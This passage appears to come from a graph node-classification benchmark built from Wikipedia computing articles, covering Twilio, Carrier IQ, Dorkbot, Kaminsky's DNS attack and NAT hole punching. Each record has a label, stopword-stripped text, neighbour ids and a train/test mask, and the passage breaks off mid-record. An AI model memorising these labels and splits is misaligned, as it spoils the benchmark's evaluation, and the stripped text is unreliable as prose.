[
  {
    "node_id": 0,
    "label": 7,
    "text": "Twilio:twilio twilio cloud communications platform service cpaas company based san francisco california twilio allows software developers programmatically make receive phone calls send receive text messages perform communication functions using web service apis twilio founded 2008 jeff lawson evan cooke john wolthuis originally based seattle washington san francisco california twilio first major press coverage november 2008 result application built jeff lawson rickroll people investor dave mcclure used techcrunch founder editor michael arrington prank days later november 20 2008 company launched twilio voice api make receive phone calls completely hosted cloud twilio text messaging api released february 2010 sms shortcodes released public beta july 2011 twilio raised approximately 103 million venture capital growth funding twilio received first round seed funding march 2009 undisclosed amount rumored around 250,000 mitch kapor founders fund dave mcclure david g. cohen chris sacca manu kumar k9 ventures jeff fluhr twilio first round funding led union square ventures 3.7 million second b round funding 12 million led bessemer venture partners twilio received 17 million series c round december 2011 bessemer venture partners union square ventures july 2013 twilio received another 70 million redpoint ventures draper fisher jurvetson dfj bessemer venture partners july 2015 twilio raised 130 million series e fidelity rowe price altimeter capital management arrowpoint partners addition amazon salesforce twilio known use platform evangelism acquire customers early example groupme founded may 2010 techcrunch disrupt hackathon uses twilio text messaging product facilitate group chat raised 10.6 million venture funding january 2011 following success techcrunch disrupt hackathon seed accelerator 500 startups announced twilio fund 250,000 micro-fund provide seed money startups using twilio september 2010 february 2014 twilio acquired authy combinator-backed startup offers two-factor authentication services end users developers enterprises september 2016 twilio acquired tikal technologies development team behind kurento webrtc open source project 8.5 million february 2017 twilio acquired beepsend swedish-based sms messaging provider undisclosed amount september 2018 twilio announced acquiring ytica prague czech republic-based speech analytics firm undisclosed amount october 2018 twilio announced acquiring sendgrid denver colorado-based customer communication platform transactional marketing email 2 billion twilio uses amazon web services host telephony infrastructure provide connectivity http public switched telephone network pstn apis twilio follows set architectural design principles protect unexpected outages received praise staying online widespread amazon web services outage april 2011 twilio supports development open-source software regularly makes contributions open-source community june 2010 twilio launched openvbx open-source product lets business users configure phone numbers receive route phone calls one month later twilio engineer kyle conroy released stashboard open-source status dashboard written python programming language api software service use display whether service functioning properly twilio also sponsors localtunnel created ex-twilio engineer jeff lindsay enables software developers expose local development environment public internet behind nat twilio lists number open-source projects website including",
    "neighbors": [
      10020,
      5830,
      8934,
      8554,
      8779,
      10090,
      7248,
      3925,
      8921,
      7547,
      10271
    ],
    "mask": "None"
  },
  {
    "node_id": 1,
    "label": 2,
    "text": "Program_compatibility_date_range:program compatibility date range program compatibility date range pcdr computer determines date range programs run windows xp widely recognized expansive pcdr covers games old 1980s windows vista however n't lucky largely due addition program files x86 file outlawed installation therefore usage dos programs vista contributed vista intense negative reception along overly-secure structure",
    "neighbors": [
      6476,
      6797
    ],
    "mask": "None"
  },
  {
    "node_id": 2,
    "label": 2,
    "text": "SYSTAT_(DEC):systat dec systat command dec tops-10 rsts/e computer operating systems one obtained current general status running operating system commands showed logged-on users processes i/o interesting system management information",
    "neighbors": [
      2,
      1804,
      6837,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 3,
    "label": 1,
    "text": "List_of_column-oriented_DBMSes:list column-oriented dbmses article list column-oriented database management system software",
    "neighbors": [
      5640,
      11530,
      10511,
      11030,
      1178,
      4255,
      8353,
      9893,
      5047,
      11203,
      3269,
      5960,
      6479,
      7767,
      8539,
      10340,
      11111,
      8683,
      7288,
      4604
    ],
    "mask": "None"
  },
  {
    "node_id": 4,
    "label": 4,
    "text": "Stealth_wallpaper:stealth wallpaper stealth wallpaper material designed prevent indoor wi-fi network extending leaking outside building malicious persons may attempt eavesdrop attack network simple prevent electronic signals passing building covering interior metal stealth wallpaper accomplishes difficult task blocking wi-fi signals still allowing cellphone signals pass first stealth wallpaper originally designed uk defense contractor bae systems 2012 register reported commercial wallpaper developed institut polytechnique grenoble centre technique du papier planned sale 2013 wallpaper blocks three selected wi-fi frequencies nevertheless allow gsm 4g signals pass network therefore allowing cell phone use remain unaffected wallpaper",
    "neighbors": [
      9640,
      7527
    ],
    "mask": "Train"
  },
  {
    "node_id": 5,
    "label": 5,
    "text": "Scalable_TCP:scalable tcp type transmission control protocol designed provide much higher throughput scalability standard tcp recommendations per rfc 2581 rfc 5681 call congestion window halved packet lost effectively process keeps halving throughput packet loss stops packet loss subsides slow start kicks ramp speed back window sizes small say 1 mbit/s 200 ms round trip time window 20 packets recovery time quite fast—on order seconds transfer speeds approach 1 gbit/s recovery time becomes half hour 10 gbit/s 4 hours scalable tcp modifies congestion control algorithm instead halving congestion window size packet loss decreases congestion window small fraction factor 1/8 instead standard tcp 1/2 packet loss stops packet loss stops rate ramped slow fixed rate one packet added every one hundred successful acknowledgements instead standard tcp rate inverse congestion window size thus large windows take long time recover helps reduce recovery time 10 gbit/s links 4+ hours using standard tcp less 15 seconds round trip time 200 milliseconds",
    "neighbors": [
      609,
      1541,
      7017,
      10924,
      7802
    ],
    "mask": "None"
  },
  {
    "node_id": 6,
    "label": 4,
    "text": "Carrier_IQ:carrier iq carrier iq privately owned mobile software company founded 2005 sunnyvale california provided diagnostic analysis smartphones wireless industry via installation software user phone typically manner removed without rooting phone company says software deployed 150 million devices worldwide iq agent software typically pre-installed mobile devices handset manufacturers network operators designed gather store forward diagnostic measurements behalf data available include metrics device e.g. firmware battery levels application performance web performance performance data voice data connectivity device radio towers mobile device manufacturers network operators determine metrics actually collected according set criteria known profile iq agent software runs background user usually aware presence unless implementation includes on-off switch iq agent periodically uploads data carrier iq mobile service intelligence platform msip system feeds network operator network performance monitoring diagnostic tools whenever mobile device uploads data iq agent also download new profile change selection metrics gathered iq agent first shipped 2006 embedded feature phones since implemented numerous devices operating systems including smartphones android rim iphone usb modems tablets msip mobile service intelligence platform refers backend carrier iq software receives mobile device diagnostic data directly mobile devices containing iq agent software platform aggregates data many devices produces kpis key performance indicators network operators mobile device manufacturers use assess quality services provide troubleshoot mobile device network problems analytics domains msip components enable system calculate specific kpis carrier iq first analytics domains cdma signaling later implementing umts third-generation mobile cellular technology gsm networks lte standard marketed 4g lte device-specific domains device stability battery application performance iq insight suite applications gathers analyzes presents kpis generated msip web-based gui graphical user interface application delivers data geospatial tabular view issues dropped calls no-service conditions allows cross-domain analysis kpis iq care dashboard tool network operator mobile device customer care agents mobile device user calls support troubleshooting iq care provides customer care agent dashboard showing consumer device configurations e.g. mobile device serial number firmware version usage history e.g. number applications installed battery life user experience metrics e.g. device application crash data radio technology analytics company founded konstantin othmer spin-off core mobility company msip software aggregates analyzes delivers data wireless carriers device manufacturers information proves valuable resource businesses understand quality service customers experience january 27 2009 ceo mark quinlivan announced carrier iq received 20 million series c financing intel capital presidio ventures sumitomo corporation company february 9 2009 carrier iq announced partnership huawei technologies develop new range datacards provide improved feedback mobile broadband user experience february 17 2009 nec carrier iq announced global partnership june 17 2009 carrier iq selected tie tie50 award winner one hottest global emerging companies june 16 2010 bridgescale partners announced 12 million series financing company october 18 2010 visionmobile announced carrier iq joined 100 million club software installed 100 million phones march 22 2011 carrier iq announced mobile intelligence 4g technologies including lte hspa+ august 31 2011 operating partner mohr davidow ventures larry lenhart named ceo announcement noted second quarter 2011 carrier iq passed petabyte milestone processed analytics data october 19 2011 carrier iq third party vendor nielsen company announced partnership analyzing data october 27 2011 idc named carrier iq innovative business analytics company 100m november 12 2011 trevor eckhart published report indicating carrier iq software capable recording various metrics including user keystrokes february 27 2012 carrier iq announced extension iq care platform designed allow mobile operators provide consumers direct insight mobile device experience may 8 2012 carrier iq appointed magnolia mobley former verizon lead privacy counsel chief privacy officer general counsel december 31 2015 reported carrier iq intellectual property talent acquired inc. november 12 2011 researcher trevor eckhart stated post androidsecuritytest.com carrier iq logging information location without notifying users allowing opt information tracked included detailed keystroke logs potentially violating us federal law november 16 2011 carrier iq sent eckhart cease desist letter claiming copyright infringement posting carrier iq training documents website also making false allegations eckhart sought received backing user rights advocacy group electronic frontier foundation eff november 23 2011 carrier iq backed apologized statement apology carrier iq denied allegations keystroke logging forms tracking offered work eff november 28 2011 eckhart published youtube video demonstrates carrier iq software act logging plain text variety keystrokes included demonstration clear-text captures passwords otherwise secure websites activities performed cellular network disabled video demonstration showed carrier iq software processing keystrokes browser data text messages contents indication information processed recorded transmitted carrier iq responded statement metrics tools derive designed deliver information intention developing tools datasheet product called experience manager carrier iq public website clearly states carriers capture vast array experience data including screen transitions button presses service interactions anomalies many already seeking suit carrier iq including numerous apps released detect carrier iq detecting carrier iq normally n't require device rooted removal process advanced requires user root device unlock device boot loader applies nexus devices order remove rooting device may void warranty since system files modified december 12 2011 carrier iq released document explain software uses document titled understanding carrier iq technology credits given dan rosenberg trevor eckhart nineteen page document provides technical breakdown software mobile phone works profiles provided carrier give carriers performance data networks devices running document appears updated regular basis questions answered time december 1 2011 carrier iq issued clarification november 23 statements individuals identified great deal information available carrier iq software inside handset software record store transmit contents sms messages email photographs audio video example understand whether sms sent accurately record transmit content sms know applications draining battery capture screen ... condition contracts operators carrier iq operates exclusively within framework laws applicable jurisdiction data gather transmitted encrypted channel secured within customers ’ networks audited customer-approved facilities ... carrier iq acts agent operators implementation different diagnostic information actually gathered determined customers – mobile operators carrier iq gather data devices carrier iq consumer advocate mobile operator explaining works work three main complaints hear mobile device users 1 dropped calls 2 poor customer service 3 constantly recharge device software allows operators figure problems occurring calls dropped extend life battery user calls complain problem software helps operators ’ customer service quickly identify specific issue phone debate whether carrier iq software actually sends collected data real time stored phone gets read later company clearly states web page software able provide real-time data carrier iq ’ mobile service intelligence solution eliminates guesswork automatically providing accurate real-time data direct source – customers handsets. february 2012 telecomtv association carrier iq filmed panel discussion/debate titled 'the data dilemma addressing question operators collect user data benefit customer commercial financial betterment participants videotaped panel discussion mike short vice president telefónica europe dean bubley founder disruptive analysis charlotte patric principal analyst gartner martyn warwick moderator telecomtv may 8 2012 carrier iq appointed chief privacy officer magnolia mobley formerly verizon lead privacy counsel news spurred new round articles discussions privacy mobile communications february 2015 htc one users began reporting carrier iq agent software overriding gps device settings order obtain location information even gps turned generally speaking analytics companies collect synthesize present aggregated user information customers help reduce maintenance costs increase revenue improve performance particular product mobile analytics provide customers telemetry telemetry important contains solutions related mobile web telephone services instance particular application mobile device crashes logs sent showing specific details issue also possible telemetry related mobile handset user webpage views click behavior also included contents sms messages kept private clarification states simple reporting success failure sms transmission provides valuable information customer habits would normally available outside cellular network information transmitted web regular basis internet service provider able see entries named.log file resides name server times user affected phone connected internet wifi method connecting extremely common many users seek keep cellular data charges low possible also utilizing home corporate wireless networks likely privacy violation targeted marketing home company internet service provider examples possible targeted marketing include offering competing phone plans android apps facilitate additional sales television guides even hardware sales like faster integrated wifi routers short way carrier iq works even company acts best intentions software betrays users leaking information outside control either carrier iq affected user phone company december 1 2011 sprint t-mobile confirmed phones sprint said collect enough information understand customer experience devices network address connection problems look contents messages photos videos etc. using tool ... information collected sold n't provide direct feed data anyone outside sprint verizon one four biggest u.s. firms say installed phones apple htc samsung said software installed phones apple said quit supporting application ios 5 said diagnostic data sent apple customers must actively opt-in share information ... never recorded keystrokes messages personal information diagnostic data plans ever said would scrub software phones future release htc whose android phone subject eckhart video said required devices number u.s carriers added important note htc customer partner carrier iq receive data application company carriers partner carrier iq nokia research motion blackberry ltd said carrier iq categorically authorized phones according company website software also installed nec mobile devices company partnership vodafone portugal although phone manufacturers carriers large say software strictly used monitor phone systems used third parties press release october 19 2011 touted partnership nielsen company press release said together deliver critical insights consumer experience mobile phone tablet users worldwide adhere nielsen ’ measurement science privacy standards alliance leverage carrier iq technology platform gather actionable intelligence performance mobile devices networks december 1 2011 senator al franken chairman united states senate judiciary subcommittee privacy technology law sent letter lenhart asking answers 11 questions asking whether company violation electronic communications privacy act including federal wiretap statute 18 u.s.c § 2511 et seq pen register statute 18 usc § 3121 et seq stored communications act 18 u.s.c § 2701 et seq computer fraud abuse act 18 u.s.c § 1030 request fbi freedom information act manuals documents written guidance used access analyze data gathered programs developed deployed carrier iq denied citing pending law enforcement proceeding led speculation fbi using data obtained carrier iq investigations fortinet deemed carrier iq security risk/rootkit using definition riskware/carrieriq android paper shared senate clarifying solution 2011 board directors november 2011",
    "neighbors": [
      9732,
      5637,
      9356,
      8978,
      10393,
      7579,
      6301,
      8355,
      3626,
      1083,
      10303,
      1602,
      7492,
      10574,
      2259,
      3162,
      4957,
      6763,
      5875,
      1524,
      7669,
      11391
    ],
    "mask": "Test"
  },
  {
    "node_id": 7,
    "label": 2,
    "text": "ACF2:acf2 acf2 access control facility commercial discretionary access control software security system developed mvs z/os today vse z/vse today vm z/vm today ibm mainframe operating systems skk inc. barry schrager eberhard klemens scott krueger combined develop acf2 london life insurance london ontario 1978 2 added acf2 name cambridge systems north american marketing rights product differentiate prototype developed schrager klemens university illinois—the prototype name acf 2 also helped distinguish product ibm acf/vtam acf2 developed response ibm racf product developed 1976 ibm answer 1974 share security data management project requirement whitepaper acf2 design guided requirements taking resource rule oriented approach unique acf2 concepts protection default resource pattern masking result competitive tension racf acf2 ibm matured saf security access facility interface mvs z/os allowed security product process os third-party software application security calls enabling mainframe secure facets mainframe operations skk acf2 sold uccel corporation 1986 turn purchased computer associates international inc. 1987 ca technologies 2012 markets acf2 ca acf2",
    "neighbors": [
      7053,
      4242,
      3477,
      11673,
      2080,
      2083,
      9635,
      2087,
      7983,
      7217,
      4663,
      5433,
      5568,
      8388,
      10058,
      6098,
      10580,
      6750,
      2143,
      8670,
      2274,
      6888,
      4586,
      9838,
      1012,
      9977,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 8,
    "label": 4,
    "text": "Dorkbot_(malware):dorkbot malware dorkbot family malware worms spreads instant messaging usb drives websites social media channels like facebook dorkbot ’ backdoor functionality allows remote attacker exploit infected systems according analysis microsoft remote attacker may able system infected dorkbot may used send spam participate ddos attacks harvest users credentials online services including banking services may december 2015 microsoft malware protection center detected dorkbot average 100,000 infected machines month december 7th 2015 fbi microsoft joint task force took dorkbot botnet 2015 u.s. department homeland security advised following action remediate dorkbot infections",
    "neighbors": [
      5540,
      8,
      4081,
      1622,
      4023,
      2041,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 9,
    "label": 9,
    "text": "Lout_(software):lout software lout batch document formatter invented jeffrey h. kingston reads high-level description document similar style latex produces postscript file printed printers plain text pdf output also available term lout primarily designates document formatting programming language implementation language jeffrey h. kingston sometimes referred basser lout basser lout free software distributed terms gnu general public license lout copies formatting algorithms tex intended much easier program due use high-level functional programming language instead macro language typical installation latex together tex binaries takes 50 300 mb lout 1 mb mainly due fewer packages tools might also attributed c implementation instead macro language source code lout comes easy-to-read user guide basics learnt couple hours includes packages creating tables charts equations diagrams everything one package box lout useful creating reports books gives precise control typesetting core lout programming language provides low-level operations similar tex packages come basser lout provide complete high-level markup language users may use directly produce documents way similar latex simple lout document may look like different document types available doc report book also slides overhead transparencies illustration stand-alone illustrations customizing document style usually relatively easy even non-programmer lout programming language similar functional languages core programming language consists less 30 primitive operators features make particularly close haskell notably fact lout expressions lazily evaluated lout also provides constructs needed implementation document formatting commonly found programming languages galleys unlike functional programming languages lout provide instance first-class functions",
    "neighbors": [
      1347,
      3876,
      5783,
      6536,
      6797,
      7983,
      11023,
      7539,
      4564,
      8627,
      8628,
      823,
      345,
      2045,
      319
    ],
    "mask": "Test"
  },
  {
    "node_id": 10,
    "label": 0,
    "text": "ETAP-3:etap-3 etap-3 proprietary linguistic processing system focusing english russian developed moscow russia institute information transmission problems rule-based system uses meaning-text theory theoretical foundation present several applications etap-3 machine translation tool converter universal networking language interactive learning tool russian language learners syntactically annotated corpus russian language demo versions tools available online etap-3 machine translation tool translate text english russian vice versa rule-based system makes different present-day systems predominantly statistical-based system makes syntactical analysis input sentence visualized syntax tree machine translation tool uses bilingual dictionaries contain 100,000 lexical entries unl converter based etap-3 transform english russian sentences representations unl universal networking language generate english russian sentences unl representations syntactically annotated corpus treebank part russian national corpus contains 40,000 sentences 600,000 words fully syntactically morphologically annotated primary annotation made etap-3 manually verified competent linguists makes syntactically annotated corpus reliable tool linguistic research etap-3 system makes extensive use lexical functions explored meaning-text theory reason interactive tool russian language learners aiming acquisition lexical functions developed learning tools created german spanish bulgarian",
    "neighbors": [
      11529,
      10610,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 11,
    "label": 4,
    "text": "Dan_Kaminsky:dan kaminsky dan kaminsky american security researcher chief scientist white ops firm specializing detecting malware activity via javascript worked cisco avaya ioactive director penetration testing known among computer security experts work dns cache poisoning showing sony rootkit infected least 568,200 computers talks black hat briefings june 2010 kaminsky released interpolique beta framework addressing injection attacks sql injection cross-site scripting manner comfortable developers june 16 2010 named icann one trusted community representatives dnssec root july 2008 cert coordination center announced kaminsky discovered fundamental flaw domain name system dns protocol flaw could allow attackers easily perform cache poisoning attacks nameservers djbdns powerdns maradns secure64 unbound vulnerable internet-based applications depending dns locate peers wide range attacks became feasible including web site impersonation email interception authentication bypass via forgot password feature many popular websites kaminsky worked dns vendors secret develop patch make exploiting vulnerability difficult releasing july 8 2008 vulnerability fully fixed design flaw dns kaminsky intended publicize details attack 30 days release patch details leaked july 21 2008 information quickly pulled mirrored others kaminsky received substantial amount mainstream press disclosing vulnerability experienced backlash computer security community immediately disclosing attack actual vulnerability related dns 65,536 possible transaction ids number small enough simply guess given enough opportunities dan bernstein author djbdns reported early 1999. djbdns dealt issue using source port randomization udp port used second transaction identifier thus raising possible id count billions popular name server implementations left issue unresolved due concerns performance stability many operating system kernels simply n't designed cycle thousands network sockets second instead implementers assumed dns time live ttl field would limit guesser attempts day kaminsky attack bypassed ttl defense targeting sibling names like 83.example.com instead www.example.com directly name unique entry cache thus ttl name sibling transaction-id guessing spoofed response could include information target well using many sibling names row could induce dns server make many requests provided enough opportunities guess transaction id successfully spoof reply reasonable amount time fix major dns servers implemented source port randomization djbdns powerdns fix widely seen stopgap measure makes attack 65,536 times harder attacker willing send billions packets still corrupt names dnssec proposed way bring cryptographic assurance results provided dns kaminsky spoken favor sony bmg cd copy protection scandal kaminsky used dns cache snooping find whether servers recently contacted domains accessed sony rootkit used technique estimate least 568,200 networks computers rootkit april 2008 kaminsky realized growing practice among isps potentially represented security vulnerability various isps experimented intercepting return messages non-existent domain names replacing advertising content could allow hackers set phishing schemes attacking server responsible advertisements linking non-existent subdomains targeted websites kaminsky demonstrated process setting rickrolls facebook paypal vulnerability used initially depended part earthlink using barefruit provide advertising kaminsky able generalize vulnerability attack verizon attacking ad provider paxfire kaminsky went public working ad networks question eliminate immediate cross-site scripting vulnerability march 27 2009 kaminsky discovered conficker-infected hosts detectable signature scanned remotely signature updates number network scanning applications available including nmap nessus 2009 cooperation meredith l. patterson len sassaman kaminsky discovered numerous flaws ssl protocol include use weak md2 hash function verisign one root certificates errors certificate parsers number web browsers allow attackers successfully request certificates sites n't control july 28 2009 kaminsky along several high-profile security consultants experienced publication personal email server data hackers associated zero 0wned online magazine attack appeared designed coincide kaminsky appearance black hat briefings def con conferences",
    "neighbors": [
      899,
      3462,
      10631,
      138,
      9868,
      4373,
      7957,
      161,
      8865,
      3619,
      7337,
      2887,
      9548,
      10448,
      9690,
      10842,
      4956,
      2275,
      4198,
      4589,
      11250,
      4212,
      1912,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 12,
    "label": 9,
    "text": "Total_functional_programming:total functional programming total functional programming also known strong functional programming contrasted ordinary weak functional programming programming paradigm restricts range programs provably terminating termination guaranteed following restrictions restrictions mean total functional programming turing-complete however set algorithms used still huge example algorithm asymptotic upper bound calculated program uses walther recursion trivially transformed provably-terminating function using upper bound extra argument decremented iteration recursion example quicksort trivially shown substructural recursive recurs maximum depth length vector worst-case time complexity n quicksort implementation lists would rejected substructural recursive checker using haskell source lang= haskell import data.list partition qsort qsort qsort let lesser greater partition make substructural recursive using length vector limit could source lang= haskell import data.list partition qsort x qsortsub x x -- minimum case qsortsub -- shows termination -- standard qsort cases qsortsub l ls -- nonrecursive accepted qsortsub l ls -- nonrecursive accepted qsortsub l ls let lesser greater partition classes algorithms theoretical upper bound practical upper bound example heuristic-based algorithms programmed give many recursions also ensuring termination another outcome total functional programming strict evaluation lazy evaluation result behaviour principle however one may still preferable even required performance reasons total functional programming distinction made data codata—the former finitary latter potentially infinite potentially infinite data structures used applications i/o using codata entails usage operations corecursion however possible i/o total functional programming language dependent types also without codata epigram charity could considered total functional programming languages even though n't work way turner specifies paper could programming directly plain system f martin-löf type theory calculus constructions",
    "neighbors": [
      3876,
      7558,
      6536,
      10953,
      8926,
      11641,
      1019,
      1982
    ],
    "mask": "Test"
  },
  {
    "node_id": 13,
    "label": 2,
    "text": "Comparison_of_privilege_authorization_features:comparison privilege authorization features number computer operating systems employ security features help prevent malicious software gaining sufficient privileges compromise computer system operating systems lacking features dos windows implementations prior windows nt descendants cp/m-80 mac operating systems prior mac os x one category user allowed anything separate execution contexts possible multiple users store private files multiple users use computer time protect system malicious users protect system malicious programs first multi-user secure system multics began development 1960s n't unix bsd linux nt late 80s early 90s multi-tasking security contexts brought x86 consumer machines major security consideration ability malicious applications simulate keystrokes mouse clicks thus tricking spoofing security feature granting malicious applications higher privileges another security consideration ability malicious software spoof dialogs look like legitimate security confirmation requests user input credentials fake dialog thinking dialog legitimate malicious software would know user password secure desktop similar feature disabled malicious software could use password gain higher privileges another consideration gone implementations usability order operating system know prompt user authorization application action needs identify requiring elevated privileges technically possible user prompted exact moment operation requiring privileges executed often ideal ask privileges partway completing task user unable provide proper credentials work done requiring administrator privileges would undone task could seen though end case user interfaces control panel microsoft windows preferences panels mac os x exact privilege requirements hard-coded system user presented authorization dialog appropriate time example displaying information administrators see different operating systems offer distinct methods applications identify security requirements pete /usr/bin/passwd a-z /usr/bin/passwd root",
    "neighbors": [
      8418,
      4163,
      9593,
      6797,
      9455,
      8976,
      8978,
      499,
      5492,
      6772,
      10835,
      537,
      8954,
      700,
      7325,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 14,
    "label": 4,
    "text": "Hole_punching_(networking):hole punching networking hole punching sometimes punch-through technique computer networking establishing direct connection two parties one behind firewalls behind routers use network address translation nat punch hole client connects unrestricted third-party server temporarily stores external internal address port information client server relays client information using information client tries establish direct connection result connections using valid port numbers restrictive firewalls routers accept forward incoming packets side hole punching require knowledge network topology function icmp hole punching udp hole punching tcp hole punching respectively use internet control message user datagram transmission control protocols using tcp nefarious hole punching possible send compressed syn packets common ack path networked devices public globally accessible ip addresses create connections one another easily clients private addresses may also easily connect public servers long client behind router firewall initiates connection however hole punching form nat traversal required establish direct connection two clients reside behind different firewalls routers use network address translation nat clients initiate connection unrestricted server notes endpoint session information including public ip port along private ip port firewalls also note endpoints order allow responses server pass back server sends client endpoint session information client peer client tries connect peer specified ip address port peer firewall open server new connection attempt punches hole client firewall endpoint becomes open receive response peer depending network conditions one clients might receive connection request successful exchange authentication nonce clients indicates completion hole punching procedure voip products online gaming applications p2p networking software use hole punching reliable hole punching requires consistent endpoint translation multiple levels nats hairpin translation outbound connection private endpoint passes firewall receives public endpoint public ip address port number firewall translates traffic connection closed client server communicate public endpoint firewall directs traffic appropriately consistent endpoint translation reuses public endpoint given private endpoint instead allocating new public endpoint every new connection hairpin translation creates loopback connection two private endpoints recognizes destination endpoint functionality necessary hole punching used within multiple-layered nat",
    "neighbors": [
      8640,
      8386,
      3011,
      581,
      5402,
      10924,
      6541,
      3792,
      4435,
      6964,
      5749,
      7859,
      8308,
      11413,
      3770,
      6877,
      10271
    ],
    "mask": "Validation"
  },
  {
    "node_id": 15,
    "label": 9,
    "text": "Speakeasy_(computational_environment):speakeasy computational environment speakeasy numerical computing interactive environment also featuring interpreted programming language initially developed internal use physics division argonne national laboratory theoretical physicist stanley cohen eventually founded speakeasy computing corporation make program available commercially speakeasy long-lasting numerical package fact original version environment built around core dynamic data repository called named storage developed early 1960s recent version released 2006 speakeasy aimed make computational work physicists argonne national laboratory easier initially conceived work mainframes kind computers time subsequently ported new platforms minicomputers personal computers became available porting code different platforms made easier using mortran metalanguage macros face systems dependencies compilers deficiencies differences speakeasy currently available several platforms pcs running windows macos linux departmental computers workstations running several flavors linux aix solaris speakeasy also among first interactive numerical computing environments implemented way cdc 3600 system later ibm tso machines one beta-testing argonne national laboratory time almost since beginning dynamic linking functionality made available operating systems speakeasy features capability expanding operational vocabulary using separated modules dynamically linked core processor needed reason modules called linkules linkable-modules functions generalized interface written fortran c. independence new modules others main processor great help improving system especially old days easy way expanding functionalities main processor often exploited users develop specialized packages besides programs functions subroutines user write speakeasy interpreted language linkules add functionalities carried typical performances compiled programs among packages developed users one important modeleasy originally developed fedeasy early 1970s research department federal reserve board governors washington d.c.. modeleasy implements special objects functions large econometric models estimation simulation evolution led eventually distribution independent product symbol colon+underscore speakeasy logo prompt interactive session dollar sign used delimiting comments ampersand used continue statement following physical line case prompt becomes colon+ampersand semicolon separate statements written physical line name tells speakeasy aimed expose syntax friendly possible user close possible spoken language best example given set commands reading/writing data from/to permanent storage e.g languages keywords upper case clarify point variables i.e speakeasy objects given name 255 character long longname option 8 characters otherwise backward compatibility dynamically typed depending value assigned arguments functions usually required surrounded parenthesis separated commas provided context remains clear unambiguous example written even many syntax simplifications possible example define object named valued ten-elements array zeroes one write following statements speakeasy vector-oriented language giving structured argument function scalar result usually object structure argument element result function applied corresponding element argument example given result function sin applied array let us call x generated function grid array answer whose element answer equals sin x 1 noels x number elements x words statement equivalent following fragment program vector-oriented statements avoid writing programs loops much faster first statement session user define size named storage work area allocator allocated beginning session within fixed-size work area speakeasy processor dynamically creates destroys work objects needed user-tunable garbage collection mechanism provided maximize size free block work area packing defined objects low end high end allocator time user ask used remaining space work area within reasonable conformity compatibility constraints speakeasy objects operated using algebraic syntax point view considering dynamic structured nature data held named storage possible say speakeasy since beginning implemented raw form operator overloading pragmatic approach features later called object oriented programming although evolve direction speakeasy provides bunch predefined families data objects scalars arrays 15 dimensions matrices sets time series elemental data kind real 8-bytes complex 2x8-bytes character-literal name-literal matrices elements real complex time series values real time series processing five types missing values provided denoted n.a available n.c. computable n.d. defined along n.b n.e meaning predetermined left available linkules developer internally represented specific small numeric values acting codes time series operations take care presence missing values propagating appropriately results depending specific setting missing values represented notation question mark symbol blank useful tables used input question mark interpreted n.a missing value numerical objects time series concept missing values meaningless numerical operations use actual numeric values regardless correspond missing values codes although missing values codes input shown note contexts question mark may different meaning example used first possibly character command line means request show pieces long error message ends symbol support provided logical values relational operators fortran syntax used logical expressions logical values stored actually numeric values 0 meaning false non-zero 1 output meaning true special objects program subroutine function objects collectively referred procedures defined operations automation another way running several instructions single command store use-file make processor read mean use command useing use-file simplest way performing several instruction minimal typed input operation roughly corresponds source-ing file scripting languages use-file alternate input source standard console contain commands user input keyboard hence multi-line flow control construct allowed processor reads executes use-files one line time use-file execution concatenated nested i.e control return caller completion called use-file full programming capability achieved using procedures actually speakeasy objects must defined work area executed option available order make procedures automatically retrieved loaded external storage needed procedures contain execution flow control constructs available speakeasy programming language program run simply invoking name using argument command execute latter case argument identify label execution begin speakeasy programs differs procedures executed scoping level referenced hence full visibility objects defined level objects created execution left subsequent uses reason argument list needed subroutines functions executed new scoping level removed finish communication calling scoping level carried argument list directions implements data hiding i.e objects created within subroutine function visible subroutine functions argument lists global level available storing object must visible within procedure e.g procedures functions differ subroutines also return functional value reference part complex statement replaced returned functional value evaluating statement extent speakeasy subroutines functions similar fortran procedures name if-then-else construct available conditional execution two forms for-next construct provided looping go label statement provided jumping fortran-like computed go statement used fort multiple branching error mechanism several options provides means error handling linkules functions usually written fortran unsupportedly c aid mortran c macros api library interface speakeasy workarea retrieving defining manipulating speakeasy object speakeasy operational vocabulary implemented via linkules statically linked core engine dynamically loaded needed provided properly compiled shared objects unix dll windows",
    "neighbors": [
      9345,
      7301,
      5129,
      9353,
      3980,
      8079,
      10641,
      1304,
      5148,
      7580,
      7326,
      7341,
      9133,
      7983,
      6962,
      823,
      5562,
      6718,
      2242,
      5830,
      5703,
      8262,
      5833,
      3791,
      2519,
      11239,
      4840,
      363,
      7148,
      5741,
      3960,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 16,
    "label": 9,
    "text": "Generic_Eclipse_Modeling_System:generic eclipse modeling system generic eclipse modeling system gems configurable toolkit creating domain-specific modeling program synthesis environments eclipse project aims bridge gap communities experienced visual metamodeling tools like built around eclipse modeling technologies eclipse modeling framework emf graphical modeling framework gmf gems helps developers rapidly create graphical modeling tool visual language description metamodel without coding third-generation languages graphical modeling tools created gems automatically support complex capabilities remote updating querying template creation styling cascading style sheets css model linking configuration accomplished metamodels specifying modeling paradigm application domain i.e domain-specific modeling language dsml modeling paradigm contains syntactic semantic presentation information regarding domain concepts used construct models relationships may exist among concepts concepts may organized viewed modeler rules governing construction models modeling paradigm defines family models created using resultant modeling environment built-in metamodeling language based uml class diagram notation metamodels ecore readable formats used well metamodel constraints specified declarative languages e.g ocl prolog alternatively java metamodel created gems plug-in generator invoked create modeling tool generated plug-in uses eclipse graphical editing framework gef draw2d plug-in visualize dsml diagram gems extension points used create interpreter traverses domain-specific model generates code interpreters also interpret model provide executable semantics perform complex analyses",
    "neighbors": [
      7777,
      9926,
      5612,
      5677,
      7983,
      3832,
      3545,
      4410,
      8923,
      3710
    ],
    "mask": "None"
  },
  {
    "node_id": 17,
    "label": 7,
    "text": "SAP_StreamWork:sap streamwork sap streamwork enterprise collaboration tool sap se released march 2010 sunset december 2015 streamwork allows real-time collaboration like google wave focuses business activities analyzing data planning meetings making decisions incorporates technology box.net evernote allow users connect online files documents document-reader technology scribd allow users view documents directly within environment streamwork supports opensocial set application programming interfaces apis allowing connect tools built third-party developers google docs version streamwork intended large enterprises uses virtual appliance based novell suse linux enterprise connect business systems including sap",
    "neighbors": [
      5210
    ],
    "mask": "None"
  },
  {
    "node_id": 18,
    "label": 7,
